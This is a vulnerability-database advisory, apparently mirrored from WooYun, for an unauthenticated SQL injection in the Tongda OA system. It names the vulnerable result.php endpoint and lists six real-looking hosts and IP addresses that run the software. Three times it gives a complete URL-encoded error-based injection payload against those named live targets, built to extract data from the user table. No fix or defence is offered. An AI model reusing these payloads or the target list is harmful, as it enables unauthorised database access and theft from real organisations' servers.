通达OA系统存在SQL注入（无需登陆）

Basic Fields

SSV ID:: SSV-96096

Find Time:: 2015-05-27

Submit Time:: 2015-05-27

Level:

Category:: 其他类型

Component:: Tongda OA

Author:: 路人甲

Submitter:: Knownsec

CVE-ID：: Add

CNNVD-ID：: Add

CNVD-ID：: Add

ZoomEye Dork：: Add

Source

http://wooyun.org/bugs/wooyun-2015-0116359

Detail

Contributor Knownsec Got 0KB

### 简要描述： RT ### 详细说明：前人案例： ``` http://wooyun.org/bugs/wooyun-2010-082959 ``` 注入链接： ``` /general/score/flow/scoredate/result.php?FLOW_ID= ``` 案例： ``` http://122.144.134.79/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.ccas.com.cn:8008/general/score/flow/scoredate/result.php?FLOW_ID=11 http://219.139.134.9:70/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.esyf.net:8000/general/score/flow/scoredate/result.php?FLOW_ID=11 http://61.153.216.116:85/general/score/flow/scoredate/result.php?FLOW_ID=11 http://idula.com/general/score/flow/scoredate/result.php?FLOW_ID=11 ``` ### 漏洞证明： SQL1： ``` http://122.144.134.79//general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23 ``` [<img src="https://images.seebug.org/upload/201505/2620264227a5a1eaba1fee7f62e5d9fbec916822.jpg" alt="01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/2620264227a5a1eaba1fee7f62e5d9fbec916822.jpg) ``` ``` SQL2 ``` http://www.ccas.com.cn:8008/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23 ``` [<img src="https://images.seebug.org/upload/201505/26202728280242a678e7c20744f4c0b8e040bf99.jpg" alt="02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/26202728280242a678e7c20744f4c0b8e040bf99.jpg) ``` ``` SQL3 ``` http://219.139.134.9:70/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23 ``` [<img src="https://images.seebug.org/upload/201505/2620283866ef93d21c2a64c3a72533d97d4bda43.jpg" alt="03.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/2620283866ef93d21c2a64c3a72533d97d4bda43.jpg) ``` ```

have 0 exchange

PoC

Unavailable PoC

Reference Linking

http://wooyun.org/bugs/wooyun-2015-0116359

Solutions

Temp Solutions

Unavailable Temp Solutions

Official Solution

Unavailable Official solution

Defense Solutions

Unavailable Defense Solutions

※Any content provided by this site, only to learn the code and services, not for illegal purposes

Basic Fields

Source

Detail

PoC

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

通达OA系统存在SQL注入（无需登陆）

Basic Fields

Source

Detail

PoC

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

Hello,

Hello,